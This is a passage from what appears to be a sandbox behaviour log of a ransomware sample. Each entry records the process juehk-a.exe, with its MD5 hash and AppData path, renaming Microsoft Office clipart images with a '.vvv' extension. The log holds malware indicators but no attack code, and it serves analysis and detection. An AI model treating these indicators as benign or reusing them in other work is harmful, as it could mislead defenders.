30481.          CreateOptions: 0x0
30482.        file:
30483.          timestamp: 96054
30484.          mode: rename
30485.          sequenceNumber: 2150
30486.          filesize: 17774
30487.          processinfo:
30488.            pid: 1648
30489.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30490.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30491.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG
30492.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG.vvv
30493.            ads:
30494.          fid (ads:): 562949953498348
30495.          ntstatus: 0x0
30496.          CreateOptions: 0x0
30497.        file:
30498.          timestamp: 96066
30499.          mode: rename
30500.          sequenceNumber: 2151
30501.          filesize: 36654
30502.          processinfo:
30503.            pid: 1648
30504.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30506.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG
30507.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.vvv
30508.            ads:
30509.          fid (ads:): 562949953498349
30510.          ntstatus: 0x0
30511.          CreateOptions: 0x0
30512.        file:
30513.          timestamp: 96076
30514.          mode: rename
30515.          sequenceNumber: 2152
30516.          filesize: 11982
30517.          processinfo:
30518.            pid: 1648
30519.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30521.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG
30522.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.vvv
30523.            ads:
30524.          fid (ads:): 562949953498350
30525.          ntstatus: 0x0
30526.          CreateOptions: 0x0
30527.        file:
30528.          timestamp: 96089
30529.          mode: rename
30530.          sequenceNumber: 2153
30531.          filesize: 11118
30532.          processinfo:
30533.            pid: 1648
30534.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30535.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30536.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG
30537.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.vvv
30538.            ads:
30539.          fid (ads:): 562949953498382
30540.          ntstatus: 0x0
30541.          CreateOptions: 0x0
30542.        file:
30543.          timestamp: 96101
30544.          mode: rename
30545.          sequenceNumber: 2154
30546.          filesize: 21998
30547.          processinfo:
30548.            pid: 1648
30549.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30550.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30551.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG
30552.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG.vvv
30553.            ads:
30554.          fid (ads:): 562949953498383
30555.          ntstatus: 0x0
30556.          CreateOptions: 0x0
30557.        file:
30558.          timestamp: 96112
30559.          mode: rename
30560.          sequenceNumber: 2155
30561.          filesize: 39982
30562.          processinfo:
30563.            pid: 1648
30564.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30566.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG
30567.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG.vvv
30568.            ads:
30569.          fid (ads:): 562949953498384
30570.          ntstatus: 0x0
30571.          CreateOptions: 0x0
30572.        file:
30573.          timestamp: 96143
30574.          mode: rename
30575.          sequenceNumber: 2156
30576.          filesize: 33694
30577.          processinfo:
30578.            pid: 1648
30579.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30580.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30581.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG
30582.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.vvv
30583.            ads:
30584.          fid (ads:): 562949953498385
30585.          ntstatus: 0x0
30586.          CreateOptions: 0x0
30587.        file:
30588.          timestamp: 96467
30589.          mode: rename
30590.          sequenceNumber: 2157
30591.          filesize: 44126
30592.          processinfo:
30593.            pid: 1648
30594.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30595.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30596.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG
30597.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG.vvv
30598.            ads:
30599.          fid (ads:): 562949953498386
30600.          ntstatus: 0x0
30601.          CreateOptions: 0x0
30602.        file:
30603.          timestamp: 96479
30604.          mode: rename
30605.          sequenceNumber: 2158
30606.          filesize: 19582
30607.          processinfo:
30608.            pid: 1648
30609.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30610.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30611.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG
30612.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG.vvv
30613.            ads:
30614.          fid (ads:): 562949953498387
30615.          ntstatus: 0x0
30616.          CreateOptions: 0x0
30617.        file:
30618.          timestamp: 96492
30619.          mode: rename
30620.          sequenceNumber: 2159
30621.          filesize: 37566
30622.          processinfo:
30623.            pid: 1648
30624.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30625.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30626.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG
30627.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.vvv
30628.            ads:
30629.          fid (ads:): 562949953498391
30630.          ntstatus: 0x0
30631.          CreateOptions: 0x0
30632.        file:
30633.          timestamp: 96507
30634.          mode: rename
30635.          sequenceNumber: 2160
30636.          filesize: 43262
30637.          processinfo:
30638.            pid: 1648
30639.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30640.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30641.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG
30642.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG.vvv
30643.            ads:
30644.          fid (ads:): 562949953498392
30645.          ntstatus: 0x0
30646.          CreateOptions: 0x0
30647.        file:
30648.          timestamp: 96518
30649.          mode: rename
30650.          sequenceNumber: 2161
30651.          filesize: 33614
30652.          processinfo:
30653.            pid: 1648
30654.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30655.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30656.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG
30657.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG.vvv
30658.            ads:
30659.          fid (ads:): 562949953498393
30660.          ntstatus: 0x0
30661.          CreateOptions: 0x0
30662.        file:
30663.          timestamp: 96530
30664.          mode: rename
30665.          sequenceNumber: 2162
30666.          filesize: 47998
30667.          processinfo:
30668.            pid: 1648
30669.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30670.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30671.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG
30672.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.vvv
30673.            ads:
30674.          fid (ads:): 562949953498394
30675.          ntstatus: 0x0
30676.          CreateOptions: 0x0
30677.        file:
30678.          timestamp: 96732
30679.          mode: rename
30680.          sequenceNumber: 2163
30681.          filesize: 17054
30682.          processinfo:
30683.            pid: 1648
30684.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30685.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30686.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG
30687.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG.vvv
30688.            ads:
30689.          fid (ads:): 562949953498395
30690.          ntstatus: 0x0
30691.          CreateOptions: 0x0
30692.        file:
30693.          timestamp: 96743
30694.          mode: rename
30695.          sequenceNumber: 2164
30696.          filesize: 19630
30697.          processinfo:
30698.            pid: 1648
30699.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30700.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30701.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG
30702.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.vvv
30703.            ads:
30704.          fid (ads:): 562949953498396
30705.          ntstatus: 0x0
30706.          CreateOptions: 0x0
30707.        file:
30708.          timestamp: 96755
30709.          mode: rename
30710.          sequenceNumber: 2165
30711.          filesize: 17374
30712.          processinfo:
30713.            pid: 1648
30714.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30715.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30716.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG
30717.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.vvv
30718.            ads:
30719.          fid (ads:): 562949953498397
30720.          ntstatus: 0x0
30721.          CreateOptions: 0x0
30722.        file:
30723.          timestamp: 96766
30724.          mode: rename
30725.          sequenceNumber: 2166
30726.          filesize: 9854
30727.          processinfo:
30728.            pid: 1648
30729.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30730.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30731.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG
30732.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.vvv
30733.            ads:
30734.          fid (ads:): 562949953498401
30735.          ntstatus: 0x0
30736.          CreateOptions: 0x0
30737.        file:
30738.          timestamp: 96778
30739.          mode: rename
30740.          sequenceNumber: 2167
30741.          filesize: 13326
30742.          processinfo:
30743.            pid: 1648
30744.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30745.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30746.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG
30747.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.vvv
30748.            ads:
30749.          fid (ads:): 562949953498404
30750.          ntstatus: 0x0
30751.          CreateOptions: 0x0
30752.        file:
30753.          timestamp: 96788
30754.          mode: rename
30755.          sequenceNumber: 2168
30756.          filesize: 10622
30757.          processinfo:
30758.            pid: 1648
30759.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30760.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30761.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG
30762.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.vvv
30763.            ads:
30764.          fid (ads:): 562949953498405
30765.          ntstatus: 0x0
30766.          CreateOptions: 0x0
30767.        file:
30768.          timestamp: 96799
30769.          mode: rename
30770.          sequenceNumber: 2169
30771.          filesize: 11902
30772.          processinfo:
30773.            pid: 1648
30774.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30775.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30776.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG
30777.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.vvv
30778.            ads:
30779.          fid (ads:): 562949953498406
30780.          ntstatus: 0x0
30781.          CreateOptions: 0x0
30782.        file:
30783.          timestamp: 96810
30784.          mode: rename
30785.          sequenceNumber: 2170
30786.          filesize: 19982
30787.          processinfo:
30788.            pid: 1648
30789.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30790.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30791.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG
30792.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG.vvv
30793.            ads:
30794.          fid (ads:): 562949953498407
30795.          ntstatus: 0x0
30796.          CreateOptions: 0x0
30797.        file:
30798.          timestamp: 96821
30799.          mode: rename
30800.          sequenceNumber: 2171
30801.          filesize: 19582
30802.          processinfo:
30803.            pid: 1648
30804.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30805.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30806.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG
30807.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.vvv
30808.            ads:
30809.          fid (ads:): 562949953498408
30810.          ntstatus: 0x0
30811.          CreateOptions: 0x0
30812.        file:
30813.          timestamp: 96834
30814.          mode: rename
30815.          sequenceNumber: 2172
30816.          filesize: 21614
30817.          processinfo:
30818.            pid: 1648
30819.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30820.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30821.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG
30822.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.vvv
30823.            ads:
30824.          fid (ads:): 562949953498409
30825.          ntstatus: 0x0
30826.          CreateOptions: 0x0
30827.        file:
30828.          timestamp: 96850
30829.          mode: rename
30830.          sequenceNumber: 2173
30831.          filesize: 30206
30832.          processinfo:
30833.            pid: 1648
30834.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30836.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG
30837.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG.vvv
30838.            ads:
30839.          fid (ads:): 562949953498410
30840.          ntstatus: 0x0
30841.          CreateOptions: 0x0
30842.        file:
30843.          timestamp: 96862
30844.          mode: rename
30845.          sequenceNumber: 2174
30846.          filesize: 43918
30847.          processinfo:
30848.            pid: 1648
30849.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30850.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30851.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG
30852.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG.vvv
30853.            ads:
30854.          fid (ads:): 562949953498411
30855.          ntstatus: 0x0
30856.          CreateOptions: 0x0
30857.        file:
30858.          timestamp: 96875
30859.          mode: rename
30860.          sequenceNumber: 2175
30861.          filesize: 16526
30862.          processinfo:
30863.            pid: 1648
30864.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30865.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30866.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG
30867.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG.vvv
30868.            ads:
30869.          fid (ads:): 562949953498412
30870.          ntstatus: 0x0
30871.          CreateOptions: 0x0
30872.        file:
30873.          timestamp: 96888
30874.          mode: rename
30875.          sequenceNumber: 2176
30876.          filesize: 8494
30877.          processinfo:
30878.            pid: 1648
30879.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30880.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30881.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG
30882.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.vvv
30883.            ads:
30884.          fid (ads:): 562949953498413
30885.          ntstatus: 0x0
30886.          CreateOptions: 0x0
30887.        file:
30888.          timestamp: 96903
30889.          mode: rename
30890.          sequenceNumber: 2177
30891.          filesize: 23550
30892.          processinfo:
30893.            pid: 1648
30894.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30895.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30896.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG
30897.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG.vvv
30898.            ads:
30899.          fid (ads:): 562949953498414
30900.          ntstatus: 0x0
30901.          CreateOptions: 0x0
30902.        file:
30903.          timestamp: 96917
30904.          mode: rename
30905.          sequenceNumber: 2178
30906.          filesize: 28910
30907.          processinfo:
30908.            pid: 1648
30909.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30911.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG
30912.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.vvv
30913.            ads:
30914.          fid (ads:): 562949953498415
30915.          ntstatus: 0x0
30916.          CreateOptions: 0x0
30917.        file:
30918.          timestamp: 96931
30919.          mode: rename
30920.          sequenceNumber: 2179
30921.          filesize: 27726
30922.          processinfo:
30923.            pid: 1648
30924.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30925.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30926.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG
30927.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG.vvv
30928.            ads:
30929.          fid (ads:): 562949953498416
30930.          ntstatus: 0x0
30931.          CreateOptions: 0x0
30932.        file:
30933.          timestamp: 96981
30934.          mode: rename
30935.          sequenceNumber: 2180
30936.          filesize: 27166
30937.          processinfo:
30938.            pid: 1648
30939.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30940.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30941.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG
30942.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG.vvv
30943.            ads:
30944.          fid (ads:): 562949953498417
30945.          ntstatus: 0x0
30946.          CreateOptions: 0x0
30947.        file:
30948.          timestamp: 97030
30949.          mode: rename
30950.          sequenceNumber: 2181
30951.          filesize: 42558
30952.          processinfo:
30953.            pid: 1648
30954.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30955.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30956.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG
30957.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG.vvv
30958.            ads:
30959.          fid (ads:): 562949953498418
30960.          ntstatus: 0x0
30961.          CreateOptions: 0x0
30962.        file:
30963.          timestamp: 97061
30964.          mode: rename
30965.          sequenceNumber: 2182
30966.          filesize: 8222
30967.          processinfo:
30968.            pid: 1648
30969.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30970.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30971.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG
30972.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG.vvv
30973.            ads:
30974.          fid (ads:): 562949953498419
30975.          ntstatus: 0x0
30976.          CreateOptions: 0x0
30977.        file:
30978.          timestamp: 97074
30979.          mode: rename
30980.          sequenceNumber: 2183
30981.          filesize: 14270
30982.          processinfo:
30983.            pid: 1648
30984.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
30985.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
30986.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG
30987.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG.vvv
30988.            ads:
30989.          fid (ads:): 562949953498420
30990.          ntstatus: 0x0
30991.          CreateOptions: 0x0
30992.        file:
30993.          timestamp: 97088
30994.          mode: rename
30995.          sequenceNumber: 2184
30996.          filesize: 8654
30997.          processinfo:
30998.            pid: 1648
30999.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31000.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31001.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG
31002.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG.vvv
31003.            ads:
31004.          fid (ads:): 562949953498421
31005.          ntstatus: 0x0
31006.          CreateOptions: 0x0
31007.        file:
31008.          timestamp: 97101
31009.          mode: rename
31010.          sequenceNumber: 2185
31011.          filesize: 16286
31012.          processinfo:
31013.            pid: 1648
31014.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31015.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31016.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG
31017.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.vvv
31018.            ads:
31019.          fid (ads:): 562949953498422
31020.          ntstatus: 0x0
31021.          CreateOptions: 0x0
31022.        file:
31023.          timestamp: 97114
31024.          mode: rename
31025.          sequenceNumber: 2186
31026.          filesize: 16158
31027.          processinfo:
31028.            pid: 1648
31029.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31030.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31031.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG
31032.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG.vvv
31033.            ads:
31034.          fid (ads:): 562949953498423
31035.          ntstatus: 0x0
31036.          CreateOptions: 0x0
31037.        file:
31038.          timestamp: 97128
31039.          mode: rename
31040.          sequenceNumber: 2187
31041.          filesize: 20590
31042.          processinfo:
31043.            pid: 1648
31044.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31045.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31046.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG
31047.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG.vvv
31048.            ads:
31049.          fid (ads:): 562949953498424
31050.          ntstatus: 0x0
31051.          CreateOptions: 0x0
31052.        file:
31053.          timestamp: 97159
31054.          mode: rename
31055.          sequenceNumber: 2188
31056.          filesize: 19294
31057.          processinfo:
31058.            pid: 1648
31059.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31060.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31061.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG
31062.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG.vvv
31063.            ads:
31064.          fid (ads:): 562949953498425
31065.          ntstatus: 0x0
31066.          CreateOptions: 0x0
31067.        file:
31068.          timestamp: 97173
31069.          mode: rename
31070.          sequenceNumber: 2189
31071.          filesize: 68990
31072.          processinfo:
31073.            pid: 1648
31074.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31075.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31076.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG
31077.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG.vvv
31078.            ads:
31079.          fid (ads:): 562949953498426
31080.          ntstatus: 0x0
31081.          CreateOptions: 0x0
31082.        file:
31083.          timestamp: 97188
31084.          mode: rename
31085.          sequenceNumber: 2190
31086.          filesize: 118782
31087.          processinfo:
31088.            pid: 1648
31089.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31090.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31091.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG
31092.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.vvv
31093.            ads:
31094.          fid (ads:): 562949953498427
31095.          ntstatus: 0x0
31096.          CreateOptions: 0x0
31097.        file:
31098.          timestamp: 97203
31099.          mode: rename
31100.          sequenceNumber: 2191
31101.          filesize: 92366
31102.          processinfo:
31103.            pid: 1648
31104.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31105.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31106.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG
31107.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.vvv
31108.            ads:
31109.          fid (ads:): 562949953498428
31110.          ntstatus: 0x0
31111.          CreateOptions: 0x0
31112.        file:
31113.          timestamp: 97219
31114.          mode: rename
31115.          sequenceNumber: 2192
31116.          filesize: 129550
31117.          processinfo:
31118.            pid: 1648
31119.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31120.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31121.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG
31122.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG.vvv
31123.            ads:
31124.          fid (ads:): 562949953498429
31125.          ntstatus: 0x0
31126.          CreateOptions: 0x0
31127.        file:
31128.          timestamp: 97237
31129.          mode: rename
31130.          sequenceNumber: 2193
31131.          filesize: 113118
31132.          processinfo:
31133.            pid: 1648
31134.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31135.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31136.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG
31137.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG.vvv
31138.            ads:
31139.          fid (ads:): 562949953498430
31140.          ntstatus: 0x0
31141.          CreateOptions: 0x0
31142.        file:
31143.          timestamp: 97291
31144.          mode: rename
31145.          sequenceNumber: 2194
31146.          filesize: 123118
31147.          processinfo:
31148.            pid: 1648
31149.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31150.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31151.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG
31152.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG.vvv
31153.            ads:
31154.          fid (ads:): 562949953498431
31155.          ntstatus: 0x0
31156.          CreateOptions: 0x0
31157.        file:
31158.          timestamp: 97307
31159.          mode: rename
31160.          sequenceNumber: 2195
31161.          filesize: 99966
31162.          processinfo:
31163.            pid: 1648
31164.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31165.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31166.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG
31167.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG.vvv
31168.            ads:
31169.          fid (ads:): 562949953498432
31170.          ntstatus: 0x0
31171.          CreateOptions: 0x0
31172.        file:
31173.          timestamp: 97327
31174.          mode: rename
31175.          sequenceNumber: 2196
31176.          filesize: 109902
31177.          processinfo:
31178.            pid: 1648
31179.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31180.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31181.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG
31182.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.vvv
31183.            ads:
31184.          fid (ads:): 562949953498433
31185.          ntstatus: 0x0
31186.          CreateOptions: 0x0
31187.        file:
31188.          timestamp: 97344
31189.          mode: rename
31190.          sequenceNumber: 2197
31191.          filesize: 91870
31192.          processinfo:
31193.            pid: 1648
31194.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31195.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31196.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG
31197.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG.vvv
31198.            ads:
31199.          fid (ads:): 562949953498434
31200.          ntstatus: 0x0
31201.          CreateOptions: 0x0
31202.        file:
31203.          timestamp: 97359
31204.          mode: rename
31205.          sequenceNumber: 2198
31206.          filesize: 81854
31207.          processinfo:
31208.            pid: 1648
31209.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
31210.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
31211.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG
31212.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG.vvv
31213.            ads:
31214.          fid (ads:): 562949953498435
31215.          ntstatus: 0x0
31216.          CreateOptions: 0x0
31217.        file:
31218.          timestamp: 97374
31219.          mode: rename
